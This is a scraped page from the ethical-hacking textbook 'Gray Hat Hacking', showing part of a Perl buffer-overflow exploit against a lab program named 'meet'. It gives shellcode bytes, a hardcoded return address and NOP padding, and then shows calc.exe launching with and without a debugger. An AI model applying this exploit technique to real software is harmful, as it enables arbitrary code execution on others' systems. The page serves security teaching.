Gray Hat Hacking, Second Edition

Prev | Current Page 473 | Next

Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking, Second Edition"

"\xb2\x5e\x5c\x6f\xd2\x16\x2d\x9f\x33\x5d\x15\xa3\x3d\xdd\x61\x24".
"\xc6\x81\xc0\x24\xde\x95\x86\xa6\x3d\x1d\xdd\xaf\xb6\x9d\xe6\xc7".
"\x8a\xc2\x5c\x59\xd6\xcb\xe4\x57\x35\x5d\x16\xff\xde\x72\xa3\x4f".
"\xd6\xf5\xf5\x51\x3c\x93\x3a\x50\x51\xfe\x0c\xc3\xd5\xb3\x08\xd7".
"\xd3\x9d\x6d\xaf";
# get_sp gave us 0x12ff60. Subtract 0x198 for buffer of 408 bytes
my $return_address = "\xC8\xFD\x12\x00";
my $nop_before = "\x90" x 24;
my $nop_after = "\x90" x 216;
my $payload = $nop_before.$shellcode.$nop_after.$return_address;
exec 'meet','Mr.',$payload
Notice that we have added thread-safe shellcode, regenerated from the Metasploit site.
C:\grayhat>Perl command.pl
C:\grayhat>Hello Mr. nV
Bye Mr. nV
??¦ truncated for brevity ??¦
The calculator popped up this time (without a crash)??”success!To slow it down a bit
and gain experience with the debugger, change the last line of the script to:
exec 'c:\\debuggers\\ntsd', '-g', '-G', 'meet', 'Mr.', $payload;
Gray Hat Hacking: The Ethical Hacker??™s Handbook
264
Now start the program again.
C:\grayhat>Perl command.pl
NOTE If your debugger is not installed in c:\debuggers, you??™ll need to change
the exec line in your script.
Voil? !Calc.exe pops up again after the debugger runs in the background.

Pages:
461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485

The Art of Agile Development (page 3) Absalom's Hair (page 120) Absolute Surrender and Other Addresses (page 10)

Beta Book

Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking, Second Edition"